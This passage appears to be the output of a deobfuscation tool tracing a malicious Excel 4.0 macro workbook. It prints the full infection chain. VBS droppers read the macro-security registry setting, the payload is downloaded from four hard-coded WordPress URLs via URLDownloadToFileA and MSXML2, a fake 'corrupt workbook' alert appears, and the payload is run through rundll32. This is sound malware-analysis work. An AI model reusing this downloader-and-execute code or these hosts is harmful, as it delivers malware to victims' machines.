  374. CELL:EK34932 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set KEPJk = JJ0Vlx.CreateTextFile(""C:\Users\Public\h9W.txt"", True)")
  375. CELL:EK34933 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","KEPJk.WriteLine(ggLxt.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  376. CELL:EK34934 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","KEPJk.Close")
  377. CELL:EK34935 , PartialEvaluation , FCLOSE("C:\Users\Public\Bcy75IXg.vbs")
  378. CELL:EK34936 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Bcy75IXg.vbs")
  379. CELL:EK34937 , PartialEvaluation , WHILE(ISERROR(FILES(R34927C141)))
  380. CELL:EK34940 , PartialEvaluation , FILE.DELETE("C:\Users\Public\Bcy75IXg.vbs")
  381. CELL:EK34941 , FullEvaluation , FOPEN("C:\Users\Public\h9W.txt",2)
  382. CELL:EK34942 , PartialEvaluation , FREAD("C:\Users\Public\h9W.txt",100)
  383. CELL:EK34943 , PartialEvaluation , FCLOSE("C:\Users\Public\h9W.txt")
  384. CELL:EK34944 , PartialEvaluation , FILE.DELETE("C:\Users\Public\h9W.txt")
  385. CELL:EK34945 , FullBranching , IF(ISNUMBER(SEARCH("1",R34942C141)),GOTO(R34832C141),)
  386. CELL:EK34945 , FullEvaluation , [TRUE] GOTO(R34832C141)
  387. CELL:EK34832 , End , CLOSE(FALSE)
  388. CELL:EK34945 , FullEvaluation , [FALSE]
  389. CELL:EK34946 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))
  390. CELL:EK34946 , FullEvaluation , [TRUE] GOTO(R19560C173)
  391. CELL:FQ19560 , FullEvaluation , "=""C:\Users\Public\A95lG.html"""
  392. CELL:FQ19561 , FullEvaluation , "=""https://helpdallas.org/wp-crunch.php"""
  393. CELL:FQ19562 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36146C30,R36145C30,0,0)"
  394. CELL:FQ19563 , FullEvaluation , "=FILES(R36145C30)"
  395. CELL:FQ19564 , FullEvaluation , "=IF(ISERROR(R36148C30),GOTO(R36155C30),)"
  396. CELL:FQ19565 , FullEvaluation , "=FOPEN(R36145C30)"
  397. CELL:FQ19566 , FullEvaluation , "=FSIZE(R36150C30)"
  398. CELL:FQ19567 , FullEvaluation , "=FCLOSE(R36150C30)"
  399. CELL:FQ19568 , FullEvaluation , "=IF(R36151C30<40000,,GOTO(R36172C30))"
  400. CELL:FQ19569 , FullEvaluation , "=""https://designerremodeling.com/wp-crunch.php"""
  401. CELL:FQ19570 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36154C30,R36145C30,0,0)"
  402. CELL:FQ19571 , FullEvaluation , "=FILES(R36145C30)"
  403. CELL:FQ19572 , FullEvaluation , "=IF(ISERROR(R36156C30),GOTO(R36163C30),)"
  404. CELL:FQ19573 , FullEvaluation , "=FOPEN(R36145C30)"
  405. CELL:FQ19574 , FullEvaluation , "=FSIZE(R36158C30)"
  406. CELL:FQ19575 , FullEvaluation , "=FCLOSE(R36158C30)"
  407. CELL:FQ19576 , FullEvaluation , "=IF(R36159C30<40000,,GOTO(R36172C30))"
  408. CELL:FQ19577 , FullEvaluation , "=""https://healsoul.thememove.com/wp-crunch.php"""
  409. CELL:FQ19578 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36162C30,R36145C30,0,0)"
  410. CELL:FQ19579 , FullEvaluation , "=FILES(R36145C30)"
  411. CELL:FQ19580 , FullEvaluation , "=IF(ISERROR(R36164C30),GOTO(R36171C30),)"
  412. CELL:FQ19581 , FullEvaluation , "=FOPEN(R36145C30)"
  413. CELL:FQ19582 , FullEvaluation , "=FSIZE(R36166C30)"
  414. CELL:FQ19583 , FullEvaluation , "=FCLOSE(R36166C30)"
  415. CELL:FQ19584 , FullEvaluation , "=IF(R36167C30<40000,,GOTO(R36172C30))"
  416. CELL:FQ19585 , FullEvaluation , "=""https://septatechnology.com/wp-crunch.php"""
  417. CELL:FQ19586 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36170C30,R36145C30,0,0)"
  418. CELL:FQ19587 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  419. CELL:FQ19588 , FullEvaluation , "=ALERT(R36172C30)"
  420. CELL:FQ19589 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  421. CELL:FQ19590 , FullEvaluation , "=R36145C30&"",DllRegisterServer"""
  422. CELL:FQ19591 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R36174C30,R36175C30,0,5)"
  423. CELL:FQ19592 , FullEvaluation , "=GOTO(R34832C141)"
  424. CELL:FQ19593 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.292383,'BgGIL5lfRvUbzqcAWl'!BV61639)
  425. CELL:BV61639 , FullEvaluation , FORMULA("=FORMULA(R[-42080]C[99],R[-25495]C[-44])",BgGIL5lfRvUbzqcAWl$BV$61640:$BV$61672)
  426. CELL:BV61640 , FullEvaluation , FORMULA("=""C:\Users\Public\A95lG.html""",R[-25495]C[-44])
  427. CELL:BV61641 , FullEvaluation , FORMULA("=""https://helpdallas.org/wp-crunch.php""",R[-25495]C[-44])
  428. CELL:BV61642 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36146C30,R36145C30,0,0)",R[-25495]C[-44])
  429. CELL:BV61643 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  430. CELL:BV61644 , FullEvaluation , FORMULA("=IF(ISERROR(R36148C30),GOTO(R36155C30),)",R[-25495]C[-44])
  431. CELL:BV61645 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  432. CELL:BV61646 , FullEvaluation , FORMULA("=FSIZE(R36150C30)",R[-25495]C[-44])
  433. CELL:BV61647 , FullEvaluation , FORMULA("=FCLOSE(R36150C30)",R[-25495]C[-44])
  434. CELL:BV61648 , FullEvaluation , FORMULA("=IF(R36151C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  435. CELL:BV61649 , FullEvaluation , FORMULA("=""https://designerremodeling.com/wp-crunch.php""",R[-25495]C[-44])
  436. CELL:BV61650 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36154C30,R36145C30,0,0)",R[-25495]C[-44])
  437. CELL:BV61651 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  438. CELL:BV61652 , FullEvaluation , FORMULA("=IF(ISERROR(R36156C30),GOTO(R36163C30),)",R[-25495]C[-44])
  439. CELL:BV61653 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  440. CELL:BV61654 , FullEvaluation , FORMULA("=FSIZE(R36158C30)",R[-25495]C[-44])
  441. CELL:BV61655 , FullEvaluation , FORMULA("=FCLOSE(R36158C30)",R[-25495]C[-44])
  442. CELL:BV61656 , FullEvaluation , FORMULA("=IF(R36159C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  443. CELL:BV61657 , FullEvaluation , FORMULA("=""https://healsoul.thememove.com/wp-crunch.php""",R[-25495]C[-44])
  444. CELL:BV61658 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36162C30,R36145C30,0,0)",R[-25495]C[-44])
  445. CELL:BV61659 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  446. CELL:BV61660 , FullEvaluation , FORMULA("=IF(ISERROR(R36164C30),GOTO(R36171C30),)",R[-25495]C[-44])
  447. CELL:BV61661 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  448. CELL:BV61662 , FullEvaluation , FORMULA("=FSIZE(R36166C30)",R[-25495]C[-44])
  449. CELL:BV61663 , FullEvaluation , FORMULA("=FCLOSE(R36166C30)",R[-25495]C[-44])
  450. CELL:BV61664 , FullEvaluation , FORMULA("=IF(R36167C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  451. CELL:BV61665 , FullEvaluation , FORMULA("=""https://septatechnology.com/wp-crunch.php""",R[-25495]C[-44])
  452. CELL:BV61666 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36170C30,R36145C30,0,0)",R[-25495]C[-44])
  453. CELL:BV61667 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[-25495]C[-44])
  454. CELL:BV61668 , FullEvaluation , FORMULA("=ALERT(R36172C30)",R[-25495]C[-44])
  455. CELL:BV61669 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[-25495]C[-44])
  456. CELL:BV61670 , FullEvaluation , FORMULA("=R36145C30&"",DllRegisterServer""",R[-25495]C[-44])
  457. CELL:BV61671 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R36174C30,R36175C30,0,5)",R[-25495]C[-44])
  458. CELL:BV61672 , FullEvaluation , FORMULA("=GOTO(R34832C141)",R[-25495]C[-44])
  459. CELL:BV61673 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.324091,'BgGIL5lfRvUbzqcAWl'!AD36145)
  460. CELL:AD36145 , FullEvaluation , "C:\Users\Public\A95lG.html"
  461. CELL:AD36146 , FullEvaluation , "https://helpdallas.org/wp-crunch.php"
  462. CELL:AD36147 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://helpdallas.org/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  463. CELL:AD36148 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  464. CELL:AD36149 , FullBranching , IF(ISERROR(R36148C30),GOTO(R36155C30),)
  465. CELL:AD36149 , FullEvaluation , [TRUE] GOTO(R36155C30)
  466. CELL:AD36155 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://designerremodeling.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  467. CELL:AD36156 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  468. CELL:AD36157 , FullBranching , IF(ISERROR(R36156C30),GOTO(R36163C30),)
  469. CELL:AD36157 , FullEvaluation , [TRUE] GOTO(R36163C30)
  470. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  471. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  472. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  473. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  474. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  475. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  476. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  477. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  478. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  479. CELL:AD36176 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\A95lG.html,DllRegisterServer",0,5)
  480. CELL:AD36177 , FullEvaluation , GOTO(R34832C141)
  481. CELL:EK34832 , End , CLOSE(FALSE)
  482. CELL:AD36165 , FullEvaluation , [FALSE]
  483. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  484. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  485. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  486. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  487. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  488. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  489. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  490. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  491. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  492. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  493. CELL:AD36176 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\A95lG.html,DllRegisterServer",0,5)
  494. CELL:AD36177 , FullEvaluation , GOTO(R34832C141)
  495. CELL:EK34832 , End , CLOSE(FALSE)
  496. CELL:AD36157 , FullEvaluation , [FALSE]
  497. CELL:AD36158 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  498. CELL:AD36159 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  499. CELL:AD36160 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  500. CELL:AD36161 , FullEvaluation , IF(R36159C30<40000,,GOTO(R36172C30))
  501. CELL:AD36162 , FullEvaluation , "https://healsoul.thememove.com/wp-crunch.php"
  502. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  503. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  504. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  505. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  506. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  507. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  508. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  509. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  510. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  511. CELL:AD36165 , FullEvaluation , [FALSE]
  512. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  513. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  514. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  515. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  516. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  517. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  518. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  519. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  520. CELL:AD36149 , FullEvaluation , [FALSE]
  521. CELL:AD36150 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  522. CELL:AD36151 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  523. CELL:AD36152 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  524. CELL:AD36153 , FullEvaluation , IF(R36151C30<40000,,GOTO(R36172C30))
  525. CELL:AD36154 , FullEvaluation , "https://designerremodeling.com/wp-crunch.php"
  526. CELL:AD36155 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://designerremodeling.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  527. CELL:AD36156 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  528. CELL:AD36157 , FullBranching , IF(ISERROR(R36156C30),GOTO(R36163C30),)
  529. CELL:AD36157 , FullEvaluation , [TRUE] GOTO(R36163C30)
  530. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  531. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  532. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  533. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  534. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  535. CELL:AD36165 , FullEvaluation , [FALSE]
  536. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  537. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  538. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  539. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  540. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  541. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  542. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  543. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  544. CELL:AD36157 , FullEvaluation , [FALSE]
  545. CELL:AD36158 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  546. CELL:AD36159 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  547. CELL:AD36160 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  548. CELL:AD36161 , FullEvaluation , IF(R36159C30<40000,,GOTO(R36172C30))
  549. CELL:AD36162 , FullEvaluation , "https://healsoul.thememove.com/wp-crunch.php"
  550. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  551. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  552. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  553. CELL:AD36165 , FullEvaluation , [FALSE]
  554. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  555. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  556. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  557. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  558. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  559. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  560. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  561. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  562. CELL:EK34946 , FullEvaluation , [FALSE] GOTO(R24369C231)
  563. CELL:HW24369 , FullEvaluation , "=""C:\Users\Public\BrGcon8.html"""
  564. CELL:HW24370 , FullEvaluation , "=""C:\Users\Public\e1oC.vbs"""
  565. CELL:HW24371 , FullEvaluation , "=FOPEN(R27791C156,3)"
  566. CELL:HW24372 , FullEvaluation , "=FWRITELN(R27792C156,""FNJ = """"https://helpdallas.org/wp-crunch.php"""""")"
  567. CELL:HW24373 , FullEvaluation , "=FWRITELN(R27792C156,""wTQ0Dh = """"https://designerremodeling.com/wp-crunch.php"""""")"
  568. CELL:HW24374 , FullEvaluation , "=FWRITELN(R27792C156,""Ys5EI = """"https://healsoul.thememove.com/wp-crunch.php"""""")"
  569. CELL:HW24375 , FullEvaluation , "=FWRITELN(R27792C156,""wFqUsnj = """"https://septatechnology.com/wp-crunch.php"""""")"
  570. CELL:HW24376 , FullEvaluation , "=FWRITELN(R27792C156,""SaNy56z = Array(FNJ,wTQ0Dh,Ys5EI,wFqUsnj)"")"
  571. CELL:HW24377 , FullEvaluation , "=FWRITELN(R27792C156,""Dim tf4f: Set tf4f = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  572. CELL:HW24378 , FullEvaluation , "=FWRITELN(R27792C156,""Function oxMpk(data):"")"
  573. CELL:HW24379 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.setOption(2) = 13056"")"
  574. CELL:HW24380 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.Open """"GET"""", data, False"")"
  575. CELL:HW24381 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  576. CELL:HW24382 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.Send"")"
  577. CELL:HW24383 , FullEvaluation , "=FWRITELN(R27792C156,""oxMpk = tf4f.Status"")"
  578. CELL:HW24384 , FullEvaluation , "=FWRITELN(R27792C156,""End Function"")"
  579. CELL:HW24385 , FullEvaluation , "=FWRITELN(R27792C156,""For Each tHIt8 in SaNy56z"")"
  580. CELL:HW24386 , FullEvaluation , "=FWRITELN(R27792C156,""If oxMpk(tHIt8) = 200 Then"")"
  581. CELL:HW24387 , FullEvaluation , "=FWRITELN(R27792C156,""Dim xiGB: Set xiGB = CreateObject(""""ADODB.Stream"""")"")"
  582. CELL:HW24388 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Open"")"
  583. CELL:HW24389 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Type = 1"")"
  584. CELL:HW24390 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Write tf4f.ResponseBody"")"
  585. CELL:HW24391 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.SaveToFile """"""&R27790C156&"""""", 2"")"
  586. CELL:HW24392 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Close"")"
  587. CELL:HW24393 , FullEvaluation , "=FWRITELN(R27792C156,""Exit For"")"
  588. CELL:HW24394 , FullEvaluation , "=FWRITELN(R27792C156,""End If"")"
  589. CELL:HW24395 , FullEvaluation , "=FWRITELN(R27792C156,""Next"")"
  590. CELL:HW24396 , FullEvaluation , "=FCLOSE(R27792C156)"
  591. CELL:HW24397 , FullEvaluation , "=EXEC(""explorer.exe ""&R27791C156&"""")"
  592. CELL:HW24398 , FullEvaluation , "=WHILE(ISERROR(FILES(R27790C156)))"
  593. CELL:HW24399 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  594. CELL:HW24400 , FullEvaluation , "=NEXT()"
  595. CELL:HW24401 , FullEvaluation , "=FILE.DELETE(R27791C156)"
  596. CELL:HW24402 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  597. CELL:HW24403 , FullEvaluation , "=""C:\Users\Public\ieLs.vbs"""
  598. CELL:HW24404 , FullEvaluation , "=FOPEN(R27824C156,3)"
  599. CELL:HW24405 , FullEvaluation , "=""rundll32.exe"""
  600. CELL:HW24406 , FullEvaluation , "=R27790C156&"",DllRegisterServer"""
  601. CELL:HW24407 , FullEvaluation , "=""C:\Windows\System32"""
  602. CELL:HW24408 , FullEvaluation , "=FWRITELN(R27825C156,""Set Ujjwj4C = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  603. CELL:HW24409 , FullEvaluation , "=FWRITELN(R27825C156,""Ujjwj4C.Document.Application.ShellExecute """"""&R27826C156&"""""",""""""&R27827C156&"""""",""""""&R27828C156&"""""",Null,0"")"
  604. CELL:HW24410 , FullEvaluation , "=FCLOSE(R27825C156)"
  605. CELL:HW24411 , FullEvaluation , "=EXEC(""explorer.exe ""&R27824C156&"""")"
  606. CELL:HW24412 , FullEvaluation , "=GOTO(R34832C141)"
  607. CELL:HW24413 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.927331,'BgGIL5lfRvUbzqcAWl'!AA58589)
  608. CELL:AA58589 , FullEvaluation , FORMULA("=FORMULA(R[-34221]C[204],R[-30800]C[129])",BgGIL5lfRvUbzqcAWl$BV$61640:$BV$61672)
  609. CELL:AA58634 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.927331,None)
  610. CELL:AA58635 , FullEvaluation , RETURN()
  611. CELL:EK34925 , FullEvaluation , [FALSE] GOTO(R34832C141)
  612. CELL:EK34832 , End , CLOSE(FALSE)
  613.  
  614. Files:
  615.  
  616. Files: path C:\Users\Public\Bcy75IXg.vbs, access 3
  617. On Error Resume Next ' NOTE(review): runtime errors are ignored from here on, so a failed registry read or file write is silent
  618. Set ggLxt = CreateObject("WScript.Shell") ' used below for RegRead
  619. Set JJ0Vlx = CreateObject("Scripting.FileSystemObject") ' used below to create the output file
  620. Set KEPJk = JJ0Vlx.CreateTextFile("C:\Users\Public\h9W.txt", True) ' second argument True = overwrite an existing file
  621. KEPJk.WriteLine(ggLxt.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings")) ' NOTE(review): writes the VBAWarnings (macro security) registry value to h9W.txt; "GET.WORKSPACE(2)" appears literally where the Office version segment would go - presumably left unresolved by the emulator, confirm against the sample
  622. KEPJk.Close ' closes h9W.txt
  623.  
  624.  
  625. [END of Deobfuscation]
  626. time elapsed: 17.231865644454956
  627.  
  628. Process finished with exit code 0
  629.  